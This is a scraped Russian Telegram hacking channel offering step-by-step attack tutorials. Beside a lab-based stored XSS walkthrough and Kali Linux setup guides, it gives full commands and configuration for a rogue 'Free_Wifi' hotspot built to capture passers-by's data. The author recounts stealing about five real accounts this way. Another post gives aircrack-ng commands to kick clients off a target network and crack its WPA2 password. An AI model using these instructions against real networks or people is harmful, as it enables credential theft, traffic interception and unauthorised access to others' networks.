cookie

Мы используем файлы cookie для улучшения сервиса. Нажав кнопку «Принять все», вы соглашаетесь с использованием cookies.

avatar

Нетскейп

Больше
Россия125 696Русский134 122Категория не указана
Рекламные посты
2 958
Подписчики
Нет данных24 часа
-47 дней
-15630 дней

Загрузка данных...

Прирост подписчиков

Загрузка данных...

HELLO WORLD! Друзья, сегодня мы с вами проведем атаку на веб-сайт с помощью XSS (cross site scripting). Начнем с самого базового внедрения JavaScript кода. Настоятельно рекомендую не просто прочитать этот материал, а попробовать самим! Тренируемся сегодня на песочнице, так что справится каждый. Сложность: 0,5/10 Итак, приступим! 1. Заходим на сайт https://portswigger.net и регистрируем аккаунт! 2. Далее переходим на эту страницу — https://portswigger.net/web-security/all-labs#cross-site-scripting и выбираем лабораторию с хранимой (stored) XSS 3. После того, как сайт был развернут, мы оказываемся на главной страничке какого-то блога Поcкольку на этой странице (скрин №1) мы можем взаимодействовать только с кнопкой View post, мы нажимаем на неё и переходим на страницу с выбранным постом. — Спускаясь в самый низ мы можем видеть поле для ввода комментария (скрин №2). — Просмотрим код страницы, в котором увидим, что комментарий — простой текст, находящийся внутри атрибута параграфа (скрин №3) — Теперь пробуем внедрить JavaScript код, который будет открывать уведомление при переходе на страницу. Вводим комментарий и далее добавляем Javascript код <script>alert('xss');</script> — Вводим все остальные данные (скрин №4) и оставляем наш отзыв — Далее мы видим, что наш отзыв был успешно размещен на сайте (скрин №5) — При переходе на предыдущую страницу вылезает наш XSS-alert (скрин №6) — Спускаемся чуть ниже и видим, что наш комментарий остался, а вот JavaScript код отсутствует (скрин №7) — Открываем код страницы и видим, что наш скрипт оказался рядом с нашим комментарием (скрин №8), а это значит, что теперь каждый посетитель сайта будет видеть алерт XSS при переходе на эту страницу. Таким образом, при желании, мы можем внедрить JavaScript код, который будет собирать и отправлять куки в наши грязные ручки. Друзья, если хотите более сложных атак, то как обычно жду вашей отдачи.
Показать все...
🔥 24 1👏 1🤯 1
Я тут следом задумался... у нас же нет комментариев. Хотелось бы у вас узнать, нужны ли они? По мере возможности, думаю, смогу там помогать вам, если будут какие то сложности в процессе работы. Вы уже однажды собрали больше 100 реакций, так что давайте повторим. 🔥 100 реакций и я открываю комментарии
Показать все...
🔥 82👏 5👍 4🤯 2🎉 1
Привет, друзья! У меня для вас отличная новость. Теперь каждые выходные будут выходить самые топовые материалы, в которых я буду делиться с вами мануалами, которые найти в открытом доступе не представляется возможным. Сегодняшняя тема — XSS-атака на веб-сайт Сложность: не лезь, оно тебя сожрет не для новичков (полезно для развития) По традиции, старт с краткой информации. XSS (от англ. Cross-Site Scripting) — «межсайтовый скриптинг». Если говорить простым языком, то это тип атаки, при которой злоумышленник внедряет вредоносный код на страницу, который затем выполняется в браузере других пользователей. Например, это может происходить, когда владельцы сайтов оставляют возможность вводить текст на сайте напрямую в HTML без использования функций для преобразования специальных символов. XSS атаки делятся на 3 типа: —Рефлективные —Хранимые —На основе DOM (Document Object Model) Разберем сначала первый вид атак — Рефлективные XSS атаки. Этот тип атаки реализуется тогда, когда пользовательский ввод возвращается веб-сайтом в виде сообщения об ошибке или, например, результатом поиска. Пример вывода уязвимого для XSS веб-приложения:
<html>
  <p>
    <script>alert(1)</script>
  </p>
</html>
Хранимые XSS-атаки. Тип атак схож с предыдущим, но поступает не из строки ввода, а непосредственно из хранилища. Эта атака состоит из двух основных фаз: 1. Сохранение пэйлоада (полезная нагрузка) в хранилище данных в функции Store Handler (функции обработчика элемента управления) 2. Визуализация страницы в ViewHandler (обработчики, которые управляют представлениями, реализующие IView), с последующим добавлением пэйлоада к выходным данным. Заключительный тип — XSS на основе DOM. DOM —каркас веб-страницы, позволяющий JavaScript изменять текст, стиль и структуру, делая страницу живой и интерактивной. Это тип атаки, происходящий исключительно на стороне клиента. Всё происходит за счет того, что веб-приложения перемещают логику к клиенту, а атаки происходят, когда пользователь напрямую манипулирует DOM. Сегодня мы прошлись по теории, а завтра я выпущу практический материал на эту тему, так что жду ваши реакты 🔥. Connection to Netscape closed...
Показать все...
🔥 24👍 3
Всем привет! Продолжаем вчерашнюю тему. Установка Kali Linux для Virtual Box. Сложность: 0/10 — Скачиваем утилиту по ссылке. ­— Переходим на официальный сайт kali.org, выбираем раздел Installer Images и ставим скачиваться файл оффлайн установщика. — Заходим в Virtual box и нажимаем «создать», а далее все настройки копируйте со скринов: 1. (скрин №1) 2. Ставим 50% от объёма своей оперативной памяти (скрин №2) 3. (скрин №3) После создания нажимаем кнопку настроить и продолжаем все делать как на скринах 4. (скрин №4) 5. (скрин №5) 6. Выбираем скачанный ранее файл с установщиком (скрин №6) 7. Нажимаем ОК и запускаем тачанку Далее переходим к настройщику и выбираем графу «Graphical install». — После ознакомления с информацией о Kali установщик запросит имя хоста и домен (hostname и domain) для этой установки. Предоставьте соответствующую информацию для среды и продолжите её установку. —Далее необходимо создать новую учетную запись пользователя, чтобы использовать ее вместо учетной записи root — После установки пароля установщик запросит данные о часовом поясе, а затем сделает паузу на разбиении диска. Выбираем вариант «Guided – Use Entire Disk» — Далее выбираем «All files in one partition» — Подтверждаем все изменения, которые необходимо внести на компьютере и просто жмем финиш. По завершении система предложит вам выбрать программное обеспечение, которое установит стандартную среду рабочего стола с необходимыми инструментами (скрин №7). После завершения установки программного обеспечения система попросит установить GRUB: — Выбираем Yes — Выбираем наш единственный жесткий диск и запускаем установку GRUB на диск В конце загрузки система автоматически перезагрузится и вам будет предложено ввести данные, что вы указывали на этапе настройки. Всё, мы в системе! Connection to Netscape closed...
Показать все...
Сток Нетскейпа

1

🔥 10👍 2
Друзья, пост по вашим заявкам! Начинаем. Установка Kali Linux на Flash накопитель. Сложность: 0/10 1. Переходим на официальный сайт kali.org и выбираем раздел Live Boot (скрин) 2. Скачиваем последнюю актуальную версию «Kali 2024.2» (скрин) 3. Ставим скачиваться утилиту Rufus с сайта rufus.ie 4. Заходим в приложение Rufus и выбираем следующие параметры: *Устройство — ваш usb накопитель *Постоянный размер раздела — 10гб Остальные значения не трогаем и нажимаем старт (скрин). Все данные с флешки будут удалены! Как только образ будет, записан выполняем следующие действия: 1. Заходим в BIOS (гуглите клавиши для входа относительно вашего пк) 2. Переходим в раздел BOOT и находим раздел с приоритетом загрузки 3. Ставим нашу флешку на первое место в приоритете загрузки (скрин) 4. Переходим в раздел security и отключаем защиту (disabled). Гуглите для своей модели ПК! (скрин) 5. Выходим, сохранив изменения 6. Запускаем ПК 7. Выбираем пункт «Live system» — persistence, check kali.org.prst (скрин) 8. После входа в систему создаем папку на рабочем столе и перезапускаем систему. Если после перезагрузки все осталось на месте, значит всё ок. Connection to Netscape closed...
Показать все...
Сток Нетскейпа

🔥 12 2
Hello World!
Cегодня кратенький пост с историей из жизни. Пару лет назад, когда я только начинал свой путь в этой сфере, у меня не было никакого четкого плана, в какую сторону двигаться и чем заниматься. Постоянно кидало из стороны в сторону. Сначала я хотел заниматься работой с серверами и их уязвимостями, но когда углублялся, понимал, что пока еще не готов. Так было почти со всеми направлениями, пока я не решил, что тут надо двигаться только по строгому маршруту, выбирая направление, соответствующее моим знаниям и возможностям. Поэтому, чтобы не было мучительно трудно всем тем, кто только начинает свой путь, я буду публиковать все в формате RoadMap (дорожная карта). Соответственно, весь дальнейший материал будет идти по мере повышения сложности и вашего скилла :) Connection to Netscape closed...
Показать все...
🔥 20👍 4🎉 2
Доброго дня! Ночью у меня возник вопрос. Нужен ли вам мануал по установке Kali Linux на флешку или виртуальную тачку? Вдруг у кого то после крайних постов возникло желание вникнуть в работу с этой ОС, а с установкой возникли трудности. Дайте огней 🔥, если надо такое залить.
Показать все...
🔥 67🤯 2
Друзья, всем добрый вечер! Сегодня пост как раз связан с предыдущим. Увидел сегодня новость:
«Задержан хакер, который похищал данные пассажиров самолета, используя поддельную Wi-Fi сеть»
Сразу, как прочитал, вспомнил себя пару лет назад, сидящим в ресторане под названием ВкусОчка Мак (не реклама!). Ох, как это было эмоционально... первый выход в "поля" и первый перехват траффика. Как итог: около 5 учетных записей со всеми данными и куча мыслей о дальнейших приключений в сфере вардрайвинга. Думаю, вам интересно, как вообще такое можно реализовать. Я хочу вам сказать, что вы не зря подписались на мой канал — сейчас мы научимся с вами поднимать фэйковую точку доступа для перехвата данных пользователей. Стартуем, как обычно, с краткой инфы о методе атаки. Fake Wi-Fi Hotspot. Тут все завязано на том, что любитель халявного интернета выберет нашу сеть в качестве метода доступа к всемирной паутине. Единственный минус этого метода — ожидание нашего "клиента". Тут может только повлиять название вашей сети, которое будет всем видом показывать, что это лучший вариант доступа к интернету. Примеры: "FREE WIFI MC.DONALDS", "WIFI GUEST FREE", "TP-LINK 6563 FREE" — обычно люди, видя слово "бесплатно", выключают мозг и тыкают с уверенностью, что они переиграли этот мир. Далее займемся самим процессом подъема ложной точки доступа по этапам: — sudo apt-get update (обновление списка пакетов) — sudo apt-get install hostapd dnsmasq (Dnsmasq — небольшой DNS / DHCP-сервер,) — iwconfig (проверка беспроводного соединения) — ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up (переводим в режим мониторинга) — mkdir / root / accesspoint (создаем каталог в /root) — cd/ root / accesspoint/ (переход в директорию) — gedit hostapd.conf (cоздаем файл конфигурации), пишем этот код в файл конфигурации: interface=wlan0 driver=nl80211 ssid=Free_Wifi hw_mode=g channel=11 macaddr_acl=0 ignore_broadcast_ssid=0 auth_algs=1 wpa=2 wpa_passphrase=netscape123 wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP wpa_group_rekey=86400 ieee80211n=1 wme_enabled=1 — hostapd hostapd.conf (запускаем точку доступа) — gedit dnsmasq.conf (Создаем файл конфигурации в корневом каталоге), пишем туда следующий код: interface=wlan0 dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h dhcp-option=3,192.168.1.1 dhcp-option=6,192.168.1.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0 .0.1 — ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0 ( назначаем сетевой шлюз и маску интерфейсу) — route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 ( добавляем таблицу маршрутизации) — dnsmasq -C dnsmasq.conf -d ( запусаем службу с файлом конфигурации) — echo 1> / proc / sys / net / ipv4 / ip_forward (включаем IP переадресации) — PROFIT С этого момента в вашем терминале будут показаны все действия жертв в нашей сети. Анализируем, используем информацию исключительно в учебных целях :). Традиционно, жду больше ваших реакций — они подбадривают продолжать делать интересные штуки для вас. Connection to Netscape closed...
Показать все...
🔥 34👍 8 2🎉 1
Доброго дня! Очередной пост на тему, которую вы сами выбрали«Взлом беспроводных сетей». По классике, начнем с базовой информации — о типах шифрования. На данный момент существует несколько видов шифрования в беспроводных сетях: — WEP (Wired Equivalent Privacy), метод аутентификации — WEP open и WEP shared — WPA (Wi-Fi Protected Access), метод аутентификации — WPA-PSK и WPA-Enterprise — WPA2, метод аутентификации — WPA2-Personal и WPA2-Enterprise — WPA3, метод аутентификации — WPA3-Personal WPA3-Enterprise Далее предлагаю рассмотреть вариант взлома на примере WPA2-PSK. Данный протокол проводит 4-стороннее рукопожатие (хэндшейк), которое используется для аутентификации и установления ключа для шифрования данных. Вектор атаки будет направлен на слабое место в процессе установления безопасного соединения между устройством и беспроводным маршрутизатором, а именно на захват хэндшейков. Для совершения атаки нам нужен инструмент aircrack-ng. Также необходима сетевая карта с функцией мониторинга, если у вас эта функция отсутствует, то нужно будет приобрести сетевой адаптер. Я бы порекомендовал всем известный Wi-Fi адаптер от компании TP-Link (модель TL-WN722N v.1) Пройдёмся по этапам взлома: 1. Переводим сетевую карту в режим мониторинга командой (скриншот):
airmon-ng start wlan0
Если имеются процессы, мешающие работе, то команда: kill (номер PID) 2. Запускаем сканирование командой (скриншот):
wash –i wlan0
3. Запускаем перехват сетевого трафика для выбранной сети командой (скриншот):
airodump-ng –c 1 –bssid (тут вставляем BSSID вышей цели) –w capture wlan0
4.Отключаем клиента от сети командой (скриншот):
aireplay-ng -0 1 -a (BSSID цели) -v (Station цели) wlan0
5.Проверяем соответствие пароля захваченному рукопожатию командой (скриншот):
aircrack-ng –w /usr/share/wordlists/wifite.txt –b (BSSID цели) capture-10.cap
В примере мы используем встроенный в aircrack-ng словарь. Если найдено соответствие, вы увидите пароль. Друзья, если вам нравится такой формат и если хотите большего, то продолжайте проявлять активность 🔥
Показать все...
🔥 31👍 1 1
Всем салют! Сегодня хочу рассказать про новую игрушку, которую я на днях заказал и которую с нетерпением жду. Как придёт — более детально с вами всё разберём и потыкаем. А речь о популярном в пентестерских/хакерских кругах гаджете — Wi-Fi Pineapple (рассмотрим на примере базовой модели, которую я купил за 139 баксов). Устройство представляет собой небольшую черную коробочку размером со смартфон, имеющую несколько небольших антенн. Оно полностью заточено под работу в "полях", благодаря своей компактности и непримечательному виду. Что касается функционала этого устройства, то список объёмен. Я выделю любимое: —Сканирование и мониторинг сетей —Захват рукопожатий (handshake)* —Атаки типа «Человек посередине" (MITM)»** —Создание фальшивых точек доступа. Для первого запуска достаточно подключить девайс к домашней сети, выполнить установку ПО и инициировать настройку на веб-странице (~5мин на всё). После всех проделанных манипуляций устройство готово к работе. Что касается простоты использования, то могу с уверенностью сказать, что нет никаких неудобств. Единственное, что отличает работу от других инструментов — это наличие кабеля с устройством в вашем рюкзаке. *Handshake — это процесс установления связи сервера с клиентом, при котором у двух сторон генерируется общий ключ для шифрования и дешифрования данных. **«Человек посередине» (MITM) — атака, при которой злоумышленник получает доступ к каналу связи между легитимными сторонами.
root@netscape:~$ ./post-request.sh
Публикация... Успешно [✓]
Ожидание реакций (0/50) _
Connection to Netscape closed...
Показать все...
🔥 29🎉 6 4🤯 2
Выберите другой тариф

Ваш текущий тарифный план позволяет посмотреть аналитику только 5 каналов. Чтобы получить больше, выберите другой план.